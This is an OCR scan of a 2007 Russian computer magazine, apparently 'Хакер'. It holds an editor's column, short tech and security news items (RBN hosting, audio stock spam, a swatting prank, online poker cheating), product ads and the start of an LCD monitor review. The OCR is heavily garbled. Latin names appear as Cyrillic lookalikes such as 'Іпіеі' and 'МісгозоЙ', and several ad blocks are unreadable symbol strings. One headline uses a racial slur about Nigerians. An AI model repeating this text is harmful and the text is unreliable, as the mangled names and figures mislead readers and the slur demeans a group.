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Новая скорость, 
новые возможности. 




“|Г| Многофункциональный домашний компьютер 



Необходимые аксессуары для компьютера 




Счастливые обладатели компьютера $*агШа$*ег 
Мадпит ЕХЕ на базе процессора Іпіеі® Соге™2 ОиасІ 
не теряют времени зря. Они работают с различными 
программами, рисуют, изучают языки, играют, разви- 
вают математические способности и обучаются мно- 
гим другим полезным вещам! 




$1агШа$(ег Мадпит ЕХЕ С206600 

Іпіеі® Соге™2 Сіиаіі 06600/1 Г6/250Г6/8600ВТ 256Мб/500Ж)Ѵ0±КѴѴ 



Внешний накопитель 
ѴѴезІегп Оідііаі РаззрогГ 

2.5"/250Гб/ІІЗВ2.0/питание от порта СІЗВ/ 
программа синхронизации и шифрования 








Рулевое колесо с ' 
эксклюзивным дизайном! 



Руль 

І.одіІесІі МОМО Касіпд 

Гоночный руль с системой обратной связи 
по усилию, ручным переключением скоростей 
и педалями. 
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Мост ѵш & 

ретранслятор до 54 МЬрз 



Точка доступа 
ТВЕШпеІ ТЕШ-430АРВ 

Работает в режиме точки доступа, клиента 
точки доступа или беспроводного моста ШЗ / 
повторителя. Дистанция покрытия до 300 метров 







Сеіегоп, Сеіегоп Іпзісіе. Сепігіпо, Сепігіпо І_одо, Соге Іпзісіе, Іпіеі. Іпіеі І_одо, Іпіеі Соге, ІпТеІ Іпзісіе, Іпіеі Іпзісіе Ьодо. Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые 
принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 
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Сеть магазинов цифровой электроники СтартМастер: 



Москва > Московская область > Санкт-Петербург 
Ростов-на-Дону ■■■ Новосибирск ■■■ Новокузнецк :■ Барнаул 
Кемеровская область =■ Алтайский край 

Адреса магазинов уточняйте на млмі.віагітазіет.ти или по телефону единой справочной. 
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Большой выбор компьютеров, ноутбуков, фото- и видеотехники, телевизоров, шрЗ, мобильных телефонов 
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ШУМИХУ РАЗДУЛИ КАКУЮ ВОКРУГ КОМПАНИИ АРРЬЕ, Я ПРЯМО УМИЛЯЮСЬ. ВЫПУСКА 
ЕТ КОМПАНИЯ ІРНОЫЕ - И ВОТ НА ТЕБЕ, КИЛОМЕТРОВЫЕ ОЧЕРЕДИ; ЛЮДИ ДАВЯТСЯ, I 
ЧТОБЫ ЗАИМЕТ Ь НОВИНОЧКУ, АККУМУЛЯТОРА КОТОРОЙ РЕДКО ХВАТАЕТ ХОТЯ БЫ НА| 
СУТКИ 



26 октября выпустила Арріе новую версию Мае 05 



| — І_еорагсІ, и все опять щебечутоб этом, каксинички 

по весне. Даже заморочились и украли свеженький релиз, разместив его на ведущих битторент-трекерах 
за 4 дня до релиза. 



Какая-то массовая Арріе-истерия по всему миру. 



] Истерия, представляющаяся лично мне чем-то вроде 

мыльного пузыря. Хотя, конечно, за всем этим достаточно забавно наблюдать. 



Мир меняется, и сознание людей тоже требует, ищетперемен.У компании Арріе можнотолько поучиться 
тому, какони научились делать и продаватьсвои продукты. Я смотрю на все, что проихсодитс Арріе-мани- 
ей по всему миру, и мне начинает казаться, что Арріе уже формирует многим людям чуть ли не стильжизни, 
заменяя им их индивидуальность. Что ни релиз — то групповой экстаз. Шутка ли, іРЬопе'ы в штатах сейчас 
отпускают примерно также, каксахар в СССР: не больше, чем по две штуки в одни руки. 



Сразу вспоминается наш старый лозунг: «N 0 МАС, опіу РС» :). 



пікііогг, гл. ред. X 
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Медапеѵѵз 



ДМИТРИЙ ТРАВИН 

/ ОМІТНУ.ТНАѴІЫ@СМДІЬ.СОМ / 



Обо всем за последний месяі_ 



іРосІ'ам 

надоело тонуть 



Довольно часто бывают ситуации, когда неакку- 
ратный владелец плеера іРосІ роняет его в воду 
или обливает чем-нибудь. Практически всегда 
это приводит к выходу устройства из строя. И что 
обычно делает нехороший владелец? Правиль- 
но — несет плеер в сервис и с невинным лицом 
доказывает, что никуда его не ронял и что «оно 
само сломалось». Если проверить факт залива 
устройства нельзя, то производителю приходит- 
ся чинить все по гарантии. Видимо, сервис-цен- 
трам Арріе это порядком надоело, и они решили 
раз и навсегда решить проблему. Для этого они 
встроили в новые іРосГы и іРЬопе датчик воды. 
Любой владелец одного из вышеперечисленных 
устройств может его найти — это белый диск 
на дне гнезда для наушников. Если этот диск 
красный, значит внутрь устройства попала вода. 
Теперь перед походом в сервис лучше предвари- 
тельно взглянуть на этот датчик самому, чтобы 
не выглядеть там совсем уж идиотом. 




Исполнительный директор Місгозой Стив Баллмер обещал в ближайшие а лет скупить 

100 компаний стоимостью до $100 млрд 





Домашние 

модемы 

Компания 2уХЕЬ представляет два новых АБЗЬ-модема для домашнего использова- 
ния — Р660КТ2 ЕЕ и Р660ІШ2 ЕЕ, отличительной чертой которых является поддержка 
технологии А05Ь2. Оба модема имеют Егііегпеі-порты, встроенные ОНСР-серверы 
и механизмы трансляции сетевых адресов. Р660ІШ2 отличается от собрата тем, что 
имеет ИЗВ-порт. Через него можно подключить модем к компьютеру и освободить 
Егііегпек для использования с телевизионным декодером (например, «Стрим-ТВ») . 
Мопеды построены на основе новой технологии АЪзоІиіе АОЗЬ, которая объеди- 
няет Аппех А, В, Ь и М. Напомню, что Аппех А используется для работы на обычных 
телефонных линиях, В — для работы в квартире с охранной сигнализацией, Ь — на 
длинных линиях (до 7 км), а Аппех М позволяет увеличить исходящую скорость до 
провайдера до 3,5 Мбит/с. В комплект поставки входит новая версия программы 
Ие1:Ргіепс1, которая значительно упрощает настройку модема как для доступа в инет, 
так и для интерактивного телевидения. 



Во время китайского праздника «Золотое 



время» вирусами были атакованы 

более 1 000 000 компьютеров 
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І450 



ЬеаТі^ 



Музыка на связи. Это твой хит! 



Представь... мобильный хит, который никогда не надоест. Слушай 
его снова и снова, общайся, делай фотографии или снимай мини- 
фильмы. В корпусе двойного слайдера І450 из коллекции 
музыкальных телефонов Затвипд ВЕАІ7 соединились ритмы 
в стиле техно и современные технологии. Удобный джойстик 
позволит тебе легко и быстро выбрать необходимую функцию. 
Затзипд І450. Живи под музыку. 



ВІиеІооФ стереонаушники в комплекте. 



ЗЛМ81Ш6 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Галерея Зашзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵѵѵѵѵ.затзипд.ги; затзипдтоЬіІе.ги. Товар сертифицирован. Реклама. 





тедап еѵг 



Виста-тюнер 

Компания Сотрго Тесііпоіозу представила тюнер ѴібеоМаНе ѴізНа М5Р 
РСІ, разработанный специально для ѴѴіпсІоѵ\геѴІ5І:а. Это универсальный 
аналоговый ТѴ/РМ-тюнер, который отлично встраивается в Мебіа Сепіег, 
идущий вместе с ѴѴіпсІоѵѵз Ѵізіа Ргетіит и іЛгітаіе. Имеется возможность 
проводить запись передач по расписанию, при этом поддерживаются 
форматы МРЕС-1/2/4. Запись может производиться и непосредственно 
на ѴСЭ- или ЭѴБ-диск. Также можно поставить прямой эфир на паузу и 
вернуться к просмотру через некоторое время. Есть возможность некото- 
рым образом разнообразить свой десктоп, выведя видеоизображение в 
качестве фоновой картинки. В комплекте с тюнером идет набор программ 
СотргоЭТѴ 4 и пульт дистанционного управления, который сертифициро- 
ван МісгозоК и может использоваться для управления как тюнером, так и 
самим компьютером. 




Отделение радиосвязи Международного союза телекоммуникаций (ГГО-К) стандартизировало 
ѴѴіМАХ и включило этот протокол в набор стандартов ИѴГГ-2000. 



Злодейский 

хостинг 

Американская газета ѴѴазЫп^оп Рози опубликовала статью, в которой 
рассказывается об очень плохом питерском хостинге под названием 
Киззіап Визіпезз КеПѵогк. Это якобы закрытый пиратский хостинг, где 
вешаются сайты с детской порнографией, рассылается спам, делаются 
фишинговые страницы и вообще творится полный беспредел. Но такой 
хостер никому не известен и вообще нигде не зарегистрирован. В статье 
говорится, что компания не имеет своего сайта, а клиенты находят ее 
сами и связываются через почту или ІС(^. После этого они проходят 
проверку на причастность к спецслужбам и только потом им разреша- 
ется воспользоваться уникальными услугами компании, которая даже 
гарантирует защиту от удаления и от наездов органов. Но само сущес- 
твование такой модели можно поставить под сомнение — слишком уж 
все сложно. В современном интернете хакеры и так без особых проблем 
находят площадки для своих корыстных целей. 

ЭДс й)05І}іпд1<т 



Мини-Винда 

В корпорации МісгозоЙ была создана 
новая концептуальная версия ОС 
ѴѴіпбоѵѵз под названием МіпіѴѴіп. 
Главной ее особенностью является 
то, что она занимает всего 25 Мб. 
Руководителем проекта является 
ведущий специалист по разработке 
программных продуктов Эрик Тра- 
ута, который ранее трудился в Арріе. Он рассказал, что МіпіѴѴіп — это са- 
мое компактное ядро ѴѴіпбоѵѵз. Сделано оно с учетом архитектуры, кото- 
рую собираются использовать в ѴѴіпсіоѵѵз 7, разрабатываемой в качестве 
замены Висте и ожидаемой в 2010 году. В МіпіѴѴіп не входит практически 
ничего — нет модулей графики и других систем. Этот проект не преследу- 
ет коммерческих целей и был создан только для демонстрации того, что 
ѴѴіпбошз может быть не такой громоздкой системой, какой является Ѵізіа. 
Большую часть объема составляют дополнительные модули, а не само 
ядро, которое на самом деле простое и компактное. Также в Микрософте 
не отрицают возможности применения полученных наработок и для 
создания компактной ОС для специализированных нужд. 






Компания 5ат$ші§ разработала самую тонкую в мире ЖК-панель — ее толщина всего 
1 см. Прошу обратить внимание, что это не ЖК-монитор, а телевизор диагональю 

40 дюймов» 



Бесстрашный Г иббон 

Вышла долгожданная версия одного из самых популярных Линукс-дистрибутивов — ЦЬипШ 7.10 СиЩу СіЬЬоп. По- 
мимо традиционно идиотского названия нас ждет также несколько улучшений: Споте 2.20, возможность поиска 
по всему компьютеру с помощью системы Тгаскег, трехмерный интерфейс пользователя, Ореп ОШсе 2.3. Кроме 
того, теперь Убунту умеет работать с дисками ЫТР5 не только на чтение, но и на запись. Раньше для этого приходи- 
лось немного потанцевать с гармошкой вокруг компьютера. Добавили более широкое управление оборудованием 
— автоматическое конфигурирование принтеров и сетевых карт. Улучшили работу с внешними дисплеями и 
проекторами. Теперь настроить проектор и второй дисплей сможет каждый. Также появился удобный механизм 
работы с плагинами Рігеіох, улучшилось время работы от батареи на ноутбуках, и сделан ряд других, более мелкий 
доработок. С каждым разом этот дистрибутив становится все более удобным и адаптированным для неопытных 
пользователей. Кстати, он до сих пор абсолютно бесплатен! 




• ^оЬітІіі 
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Б*8 




Поздравляй от всей души 
и во весь голос 



<и ^ 

ж & 
л ^ 
& >» 



Записывай и отправляй «Говорящее письмо» 



Теперь абоненты «Билайн» могут поздравлять друг 
друга сообщениями, записанными голосом. 

Чтобы отправить «Говорящее письмо», наберите 
К номер адресата в 10-значном формате Ш ■ 

Следуя инструкциям, запишите свое письмо и подтвердите 
его отправку, дважды нажав на любую клавишу от і до і . 
Ваш адресат получит 5М5 с номером для прослушивания 
письма. 



Если во время сеанса записи вы передумали отправлять 
«Говорящее письмо», нажмите на іг . 

Первое прослушивание каждого письма бесплатно. 
Повторное прослушивание и прослушивание писем 
из архива оплачиваются как исходящий внутрисетевой 
звонок по вашему тарифному плану. 

Доступ к архиву писем: « 00 ВТ. 



Узнай больше © Об 04 34 

ѵѵѵѵш.ЬееІіпе.ги 



0 

Билайн - 

живи на яркой стороне 
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Финансовые рі 



аты компании < 



гий кварі 



года превзошли самые 



смелые прогнозы, в результате чего акции достигли очередной рекордной < 

$640 . Капитализация составила $199,65 млрді 



Аудиоспам 

«Лаборатория Касперского» обнаружила совершенно 
новый вид спама, в котором в качестве вложения к письму 
используется трЗ-файл. Открыв его, пользователь услы- 
шит искаженный фильтрами женский голос, предлага- 
ющий очень выгодно купить акции компании Ехй Опіу 
Іпс. Это так называемый зГоск-спам, который применя- 
ется злоумышленниками, когда последние завладевают 
акциями какой-либо компании и пытаются через спам 
увеличить ее капитализацию, а потом банально продать 
бумажки подороже. Кстати, именно в таком спаме впер- 
вые были использованы многие новые методы доставки 
— графические файлы с искажениями, текст в формате рсК 
и прочие. Такие виды рассылки не очень удачны: текст на 
искаженных картинках читаем слабо, а качество звука в 
трЗ-файлах настолько плохое, что очень сложно разо- 
брать слова. При этом спамеры забывают о своей главной 
задаче — заставить пользователя отреагировать на спам 
и купить-таки акции или что они там предлагают. Более 
важным становится любыми способами обойти спам- 
фильтр и доставить сообщение пользователю, пусть хоть и 
неразборчивое. 





Неграм не нужен 
Билл Гейтс 



Недавно мультимиллиардер Билли Гейтс 
посетил Африку и ему понадобилась виза, 
чтобы путешествовать по Нигерии. Казалось 
бы, в чем проблема? Всемирно известный и 
богатейший человек решил посетить страну. 
Но оказалось, что все не так просто — ниге- 
рийские власти заподозрили Гейтса в том, что 
он может незаконно остаться на территории 
их государства и, видимо, подрабатывать 
грузчиком или надсмотрщиком за ручными 
обезьянами. Вот как бывает — всю жизнь 
работаешь, зарабатываешь миллиарды и... 
решаешь незаконно иммигрировать в Ниге- 
рию . Да просто так, надоело все ! Но с другой 
стороны, при оформлении виз во многие стра- 
ны необходимо письменно подтвердить, что 
ты обязуешься уехать из страны по истечении 
срока визы. Вероятно, господин Вильям Гейтс 
Третий просто забыл это сделать... 



28% пользователей рунета считают системы оплаты через интернет надежными 
и безопасными, в то время как 45% придерживаются противоположной точки зрения. 
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Ваши способности. Наше вдохновение. 

МісгозоП 



отразить вторжение отразить атаку хакеров, 
инопланетян, просто. проще простого. 



1. Соберите армию, вызовите флот 
и позвоните на канал Оізсоѵегу. 

Они всё знают. Они могут атаковать 
с воздуха и взять ситуацию под 
контроль, но потом проблемы будут 
и у вас, и у них. На них работают 
лучшие ученые, они владеют 
последними разработками, 
созданными как раз для таких целей. 
Может, они вам и помогут. 



4 . Попробуйте договориться. (Или не пробуйте.) 
Может, они и не пришли к нам с миром, но все-таки 
это высокоразвитые существа. Представьте, что они 
ваши клиенты, и продайте им идею, что человечество 
нужно беречь. Покажите презентацию на 50 слайдов, 
а затем заключите сделку. Или просто хватайте их 
за ноги и раскручивайте, пока не закружится голова. 



1. Внедрите МісгозоЙ Роге(гоп*. 

Защищать вашу систему станет еще проще. 
Новое семейство продуктов информационной 
безопасности, включающее защиту периметра, 
клиентов и серверов (например, Рогеітопі Бесигііу 
Рог ЕхсНапде 5егѵег), просто интегрировать 
и использовать. Рогеітопі поможет предупредить 
все угрозы безопасности проще, чем когда-либо. 
Чтобы узнать, как РогеРгопІ помог защитить систему 
международного аэропорта Вены, посетите 
шѵѵѵѵ.рго$Ьерго5Іодо.ги 



2 . Украдите ключи от их корабля. 

Звучит безумно, но должно сработать. Когда они поймут, 
что застряли здесь, возможно, решат расслабиться 
и отдохнуть от завоеваний. 



3. Чихайте на них. 

Иммунная система пришельцев 
отличается от нашей. 

Значит, даже обычный насморк 
может стать для них смертельным. 
Чихайте и кашляйте в их сторону, 
плюйтесь во время разговора - 
даже если с иммунитетом 
у них все в порядке, они могут 
обидеться на грубость и улететь. 



5 . Заморочьте им голову, 
а потом - бегите. 

Пришельцы не знают, кто тут главный. 
Скажите им, что на Земле правят белки, 
а люди - их покорные рабы. 

И пока они будут вести переговоры 
с белками, убегайте и прячьтесь. 




Реклама 






30-летняя американка Джемми Томас должна выплатить шести Фирмам по 



$9250 



т24 песен 



!, которые она незаконно скачала через 


И 


айлоо 


В 


менн 


НЯ 


сеть Каяаа. 



Образованные хакеры 

Газета Иеѵѵ Уогк Тітез опубликовала статью «ѴѴкаИ’5 Киззіап Гог 
Наскег» («Что значит русский язык для хакера») , в которой высказы- 
вается интересное мнение о том, почему Россия является родиной 
многих хакеров. В качестве первой причины называется довольно 
высокий уровень технического образования. В принципе, без этого 
не обойтись. Другой причиной, по мнению газеты, является то, что, 
когда российская экономика еще не вышла из кризиса, для многих 
способных людей с хорошим образованием просто не было интерес- 
ной и перспективной работы. Вдобавок общество после падения 
советского строя довольно продолжительное время не отличалось 
законопослушностью. В результате не было ни моральных, ни ин- 
теллектуальных преград для совершения преступлений в компью- 
терной сфере. Хотя по количеству хакеров и пользователей интер- 
нета Россия и уступает США и Китаю, по процентному отношению 
хакеров к другому населению мы их превосходим. Автор статьи пер- 
спективы не оценивает, поэтому их оценю я: в ближайшее время с 
развитием доступа в интернет в регионах большее число хакеров 
будет именно там, поскольку с функционированием компьютерной 
области там еще большие проблемы... 




Преступники, ограбившие легендарного режиссера 



ильма на продажу всего за 



$ 1 . 



энсиса Форда Копполу, выставили 



Переделки отЗопу 



Компания Зопу очень любит уменьшать свои продукты. В свое время 
была довольно сильно уменьшена приставка РІауЗнагіоп 2, при этом 
не потеряв своей функциональности и, главное, не взлетев в цене. 
Подобная история повторяется и с РІау5і:а1:іоп РоіФаЫе, для которой 
размер гораздо более важен, ведь ее обычно носят в кармане. Новая 
Р5Р-2000 стала тоньше на 19% процентов и похудела ровно на треть. 
Помимо размеров есть еще некоторые приятности: новый ЬСП-эк- 



ран в 4,3 дюйма и видеовыход, с помощью которого теперь можно 
смотреть видео на большом экране, а также играть. Кроме того, на 
российском рынке появилась дешевая модель приставки РІауЗііагіоп 
3 . Она отличается меньшим объемом жесткого диска — 40 Гб. Вместо 
четырех портов ИЗВ у нее их всего три и напрочь отсутствует слот 
карт памяти. Все эти изменения позволили уменьшить стоимость 
приставки до 15 990 рублей. 
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Используйте 
компьютеры ОШі 

и забудьте о проблемах I 



сотріЛегз 




Щ1ѴМІ ЫІМН*. ОК'-РИР* 
* яАа к» «ііГідрнм 
Ш МА» СЧМІГЯН 




КййЧП№>(ІВ !№чпІЬ.Т.Ми - 
«рп«іъчя рмівчі ода я», 

ГЪ ІС-ТѴѴ ЬП І>^ѴНК,ММ# 
К-М-ЛІ-І Ч тгпуі) «і:де:ь 




Ши!!<|| 0Л Мп'Хи 
ІЕТВП Р ЖХНРЧЧІ рвхрн. 

-НЙЩ*™ К* 

ВЙГ'» по^Ні.ЯІЖЛ 



Г' І**тИіИЦ?в 

іи даі чыдвд 



П ГрвфАжч*±5 

6м ЦНііЕЙГНІЗ 



1* СіЧрЛБ 
Гіт ЦИПЯІГЛВД 



Единая справочная: ( 495 ) 221 1111 шлг.оІРІ щ 
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За найденный ноутбук - 
пиво пожизненно 



Владелец пивоварни в новозеландском городе Роторуа не любил делать 
бэкапы и хранил на своем ноутбуке много важной информации. В конце 
концов этот ноуту него, естественно, благополучно сперли. Поль Кра- 
учер — так зовут неудачливого пивовара — очень опечалился такому 
повороту событий и через местные газеты объявил, что нашедшему его 
лэптоп пожизненно будет выдавать по 12 бутылок пива в месяц. Такая 
акция обойдется его пивоварне примерно в 19,5 тысяч долларов. На 
столь заманчивое предложение уже откликнулось несколько ярых лю- 
бителей пенного напитка и они по телефону заверили Поля, что активно 
ведут поиски. Главное, чтобы нашедшему ноутбук потом не захотелось 
украсть ноуту владельца колбасного завода, чтобы, предложив ему 
схожий вид вознаграждения, обеспечить себя на всю оставшуюся жизнь 
еще и закуской. 




Просто круглый 

Готов поспорить, что ты не видел ни 
одного круглого ЖК-дисплея. Единст- 
венным вариантом создания круглого 
экрана было закрытие лишних дета- 
лей элементами корпуса. При этом 
экран был круглым, а корпус все равно 
оставался прямоугольным. Техноло- 
гически невозможно было создать 
дисплей с расположением пикселей 
по кругу. Но для компаний ТозЫЬа и 
МаСзшЫса это не стало проблемой. 

Первый образец круглого дисплея имеет диаметр 25 миллиметров и 
разрешение 240 пикселей. Разрешение у круглых дисплеев считают по 
количеству пикселей от центра до края, то есть по радиусу. Сразу можно 
организовать мини-конкурс: попробовать придумать, зачем такой дис- 
плей может понадобиться. ЖК-часы? Возможно, но пока вроде обходи- 
лись квадратными. . . ЖК-аквариум? Тут нужна сфера, а не окружность. . . 
Дизайнерская ЖК-рамка для фотографий? Ну, немного глупо. Сами раз- 
работчики утверждают, что без таких дисплеев не обойтись при создании 
современных приборных панелей в автомобилях и новых портативных 
устройств. Поживем — увидим. 




«Я люблю 
журнала "Хакер"» 

Именно так перевела фразу «I Іоѵе Хакер та§агіпе» система машинного 
перевода от Соо§1е. Как видно, перевод никуда не годится. Правда офици- 
ального статуса она еще не получила — напротив названия направления 
перевода с английского на русский красуется надпись «ВЕТА». Но наедине 
только с переводчиком Гугл решил русских пользователей не оставлять 
и открыл еще и словарь. На нем тоже весит значек ВЕТА, но работает он в 
разы лучше, чем переводчик. Вообще русский язык — большая проблема 
для всего Соо§1е. Из-за сложности обработки фраз на русском языке поис- 
ковик не всегда выдает релевантные запросы. А уж как работает система 
контекстной рекламы АбЗепзе в русском сегменте интернета, давно ходят 
истории. Правильно определить тематику страницы и поставить на нее 
соответствующую рекламу ино- 
гда получается из рук вон плохо. 

Но словарь выполняет свои 
функции вполне хорошо — бег- 
лое тестирование по матерным 
словам на русском и английском 
языках дало вполне достойные 
результаты. 




Российские компании потратили 



$26 МЛН! 



а системы 
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«Пчелиные» карты 



Абоненты «пчелиного» оператора сотовой связи «Би- 
лайн» теперь могут воспользоваться новым интер- 
активным сервисом — «Гугл Картами». Мобильная 
версия карт, как и обычная, может отображать карты 
и спутниковые фотографии, имеет поиск по адресам 
и возможность подбора маршрута между двумя 
точками. Чтобы не просрать все деньги на мобиле, 
разглядывая фотографии африканских деревень, 
предусмотрен счетчик трафика, который постоянно 



отображается в правом верхнем углу. Для загрузки 
приложения необходимо получить ѵѵар-ссылку одним 
из этих способов: 

• по номеру 0684300 (ссылка придет в зтз), 

• по номеру 06500 (ссылка придет в зтз) , 

• по номеру *120*466453# (ссылка придет в зтз), 

• на ѴѴАР-портале «Билайн» (канал «День заднем», 
раздел «Полезно»), 

• в1155П-меню *111# (раздел «Полезно»). 




Билайн 1 
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У британской 
разведки едет 
крыша 



ГвоГ*ІГТІТШІ 




Пресс-служба Штаба правительственной связи Великобри- 
тании недавно сообщила, что они будут вербовать новых со- 
трудников через компьютерные игры. Испытания планиру- 
ют провести на игре Тот Сіапс/з ЗрИпГег Сеіі: БоиЫе А§ет, в 
которую будут встроены плакаты с сообщением о приеме на 
работу. Просто так объявление увидеть не получится — для 
этого придется порыться в интернете или иметь «пристав- 
ку специальной модели». Чтобы из виртуального шпиона 
превратиться в реального, обладать каким-то уникальным 
набором качеств не требуется — достаточно хорошо знать 
компьютер, быть технологически подкованным и уметь 
оперативно действовать в нестандартных ситуациях. Такой 
метод приема на работу довольно сильно отличается от ис- 
пользуемого ранее — от плакатов на лондонских автобусах. 
Стоит отметить, что потенциальным шпионам, завербован- 
ным через игру, не стоит ожидать опасных миссий с писто- 
летом в руке — набор проходит в главный прослушивающий 
центр в Челтнеме. Так что стать настоящим Сэмом Фишером 
пока не получится. 



Российский 

суперкомпьютер 

Межведомственный суперкомпьютерный центр Российской академии наук (оказы- 
вается, и такой есть :)) строит суперкомпьютер с достойной производительностью 
— 100 терафлопс. Вычислительная система разрабатывается совместно со специа- 
листами из Ітеі и НР и по оценкам войдет в пятерку самых мощных суперкомпьюте- 
ров Европы, а также в 50 самых высокопроизводительных систем по всему миру. До 
этого в России столь мощных суперкомпьютеров еще не строили. С помощью нового 
кластера собираются решать научные задачи в области физики, химии, биологии, 
астрономии и т.д. Он позволит проводить вычисления наравне с другими мировы- 
ми научными державами. Суперкомпьютер состоит из блейд-серверов НР РгоЬіат 
ВЬ460с на базе новейших четырехъядерных процессоров Ітеі® Хеоп® 5365. Сейчас 
мощность составляет 45 терафлопс, а до заявленных 100 терафлопс обещают проап- 
грейдиться в начале 2008 года. 
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Скайпофон, родной 

Уже давно существуют мобильные телефоны, которые даже не имеют модуля сото- 
вой связи. Для общения с внешним миром им достаточно модуля ѴѴі-Рі и програм- 
мы для разговоров через интернет. Самой популярной программой такого рода 
является Зкуре. Помимо отдельных телефонов, Зкуре устанавливали и на обычные 
смартфоны. В принципе, с учетом развития сетей \Ѵі-Рі и их достаточного количес- 
тва в крупных городах, экономия денег на звонках становится вполне реальной. 
Это обстоятельство и позволяет подобным «недотелефонам» достаточно успешно 
продаваться. И компания еВау, которая является владельцем Зкуре, это заметила и 
решила не упускать столь лакомого кусочка. Они создали свой, родной Зкуре-теле- 
фон. По заявлениям, он будет намного удобнее аналогов и его планируют заточить 
под мультимедийные приложения и серфинг инета. Продавать его собираются в 
Австралии, Гонконге, Индонезии, Австрии, Дании, Италии, Ирландии, Швеции 
и Великобритании. Понятное дело, что на официальные продажи на территории 
России можно особо не надеяться. 




5оНооІ 2007 



В октябре в Москве проходила одна их крупнейших российских ІТ- 
выставок — ЗоІНооІ. Совместно с коллегами из журнала «Железо», мы 



ЕсІіЛеі* 



участвовали на этой выставке и каждый день привлекали на стенд не- 
имоверную тучу народа. На стенде было реально круто: железячники 
показывали азотное шоу с разгоном камней, демонстрировали крутой 
моддерский ноутбук, а Длинный проводил на стенде свои фрикерские 
конкурсы, разыгрывая очень крутые и качественные колонки ЕбШег. 
От всей души благодарим эту замечательную компанию за предо- 
ставленные призы. Респект, победители наших конкурсов были очень 
довольны ;). 




Старые шутки 

Когда я учился в школе, директору очень часто звонили и сообщали о якобы заложенной 
бомбе. Естественно, это приводило к тому, что занятия прекращались, все ученики 
радостно шли домой, а милиция с собаками долго грустно бродила по всему зданию в 
поисках взрывчатки. Мотивация здесь понятна: кому-то просто не хотелось сидеть на 
уроках, и таким способом он себя от них освобождал. Но что двигало 19-летним парнем 
из штата Вашингтон понять сложно. Видимо, просто желание постебаться. Действовал 
он несколько иначе: сначала по телефонному справочнику он нашел адрес двух пенсио- 
неров из Калифорнии, а затем по внутренней телефонной сети полиции штата сообщил, 
что в этом доме совершено жестокое убийство нескольких человек. Реакция была 
соответствующая — спецназ с собаками и вертолетами быстро выдвинулся разбираться 
с пенсионерами. Старики, правда, отмазались. Но подобные шутки с рук просто так не 
сходят. Как в свое время нашли халявщика из нашей школы, так и шутник из Вашингто- 
на был задержан и сейчас ждет начала судебного разбирательства. 



Хитрое казино 



В прошлом месяце разгорелся самый крупный скандал в истории так 
называемых покер-румов. Последние представляют собой набор комнат, 
в которых люди могут поиграть в виртуальный покер на реальные деньги. 
Наиболее известным покер-румом является АЪзоІіПе Рокег СаЬзокПерокег. 
сопО . Именно его и уличили в мошенничестве. Многие давно уже 
подозревали, что некоторые пользователи имеют немного больше воз- 
можностей, чем другие игроки: видят чужие карты и знают следующие 
раздачи. Такие пользователи являются разработчиками или тестерами 
и не имеют права играть сами, но ведь они могут банально подсказывать 
своим друзьям. Таким другом и был игрок под ником Роігіррег, который 
блистательно всех обыграл на последнем чемпионате. Игрок, занявший 
второе место, заподозрил неладное и потребовал у покер-рума прислать 
историю всех раздач. И тут произошла небольшая лажа — выслали не 
историю всех раздач, а вообще полную расшифровку игры, включай 



ІР-адреса и ГО игроков. Тут-то и стало очевидно, что необычайная удача к 
победителю пришла тогда, когда к наблюдателям присоединился человек 
с ГО =363, имеющий тот же айпишник, что ГО= 10. Учитывая, что ГО 
выдаются по порядку, 
можно с уверенностью 
сказать, что это кто-то 
из создателей сервиса 
и он явно подсказывал 
победителю. Видео с 
восстановленной иг- 
рой можно посмотреть 
здесь: ѵѵѵѵѵѵ.уоишЬе. 
сот/\ѵаСс 1 і?ѵ=Рс 2 Ь 
57РІѴѴ5М . 
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Сила мысли 

Группа исследователей из Лаборатории биомедицинской техники разрабо- 
тала новый интерфейс, позволяющий управлять компьютерными играми 
с помощью силы мысли. Интерфейс получил название «Мозг-компьютер» 
(Вгаіп-сотріПег іпіегіасе, ВСІ) и уже сейчас дает возможность управ- 
лять персонажами в игре Зесопсі Ше. Но игры — это не основной мотив, 
побудивший ученых заняться разработкой. Устройство, которое с виду 
очень похоже на обычный шлем виртуальной реальности, должно помочь 
парализованным больным общаться с помощью текстовых сообщений в 
интернете, делать виртуальные покупки и т.п. Создатели также подчер- 
кивают, что ВСІ может поспособствовать и лечению больных. «Если они 
своими собственными глазами увидят, что управляемый ими виртуальный 
персонаж двигается, то, возможно, активность их головного мозга восста- 
новится, а вслед за ней вернутся и некоторые функции тела», — надеется 
ДзюнитиУсиба, возглавляющий группу исследователей. Поступит ли 
устройство в массовую продажу, пока не известно. 






СогеГ2 Оно 

Іпзіде' 



Сфокусируйтесь на бизнесе 

Компьютеру ОиагЯзФ серии с технологией Іп{е№ ѵРго™ 

поддерживают инновационные функции безопасности. 

производительности и удаленного управление, 

которые нс.] сопят Вам экономить время 

при обслуживай ии инфраструктуры 

и уделять больше времени развитию своего бизнеса. 
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КИРИЛЛ АВРОРИН СЕРГЕЙ НИКИТИН 

Выбираем 20-дюймовый 
монитор 

ТЕСТИРОВАНИЕ І.СО-МОНИТОРОВ С ДИАГОНАЛЬЮ 20 м 



Мониторы, построенные с помощью ЭЛТ, давно битву устройствам ЬСЭ, что не может не ра- 
довать, ведь последние лучше во всех смыслах: они качественнее, технологичнее, компакт- 
нее, безопаснее, симпатичнее. . . Цены на жидкокристаллические девайсы упали до вполне 
приемлемых величин, поэтому мы можем задумываться о покупке устройства с диагональю 
как минимум 17 дюймов. А если добавить еще немного средств, то твой рабочий стол вполне 
могут украсить и 20 дюймов! 



г технологии 

В продаже часто можно встретить ЖК-мониторы 
с примерно одинаковой диагональю, при этом 
цена одного из них может превышать стоимость 
другого иногда даже в два раза. В чем дело? Нет, 
мы не сравниваем продукцию неизвестного ки- 
тайского производителя стоповой моделью 5опу. 
Все дело в типе матрицы, которая используется 
в дисплее. От нее сильно зависит качество 
изображения, скорость работы (время отклика] и, 
соответственно, цена. 

На данный моментпроизводителями активно ис- 
пользуются три вида матриц. Самая распростра- 
ненная — ТЫ, что расшифровывается какТѵѵізіес! 
Ыетабс. Продолговатые округлые кристаллы 
располагаются параллельно плоскости самого 
дисплея, а со второго ряда кристаллов они 
размещены по спирали. Иными словами, первый 
и последний ряды кристаллов расположены 
перпендикулярно друг к другу, а все остальные 
между ними — по спирали. Соответственно, свет 
